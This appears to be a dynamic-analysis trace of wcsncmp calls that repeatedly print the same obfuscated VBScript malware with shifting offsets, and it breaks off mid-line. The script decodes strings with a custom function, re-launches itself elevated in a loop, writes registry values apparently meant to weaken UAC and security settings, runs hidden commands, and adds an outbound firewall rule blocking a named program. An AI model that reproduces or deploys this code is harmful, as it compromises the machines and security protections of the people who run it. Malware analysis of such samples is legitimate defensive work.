bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.945] wcsncmp (_String1=" (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.945] wcsncmp (_String1="(Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.945] wcsncmp (_String1="Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0222.945] wcsncmp (_String1="en(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.946] wcsncmp (_String1="n(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT 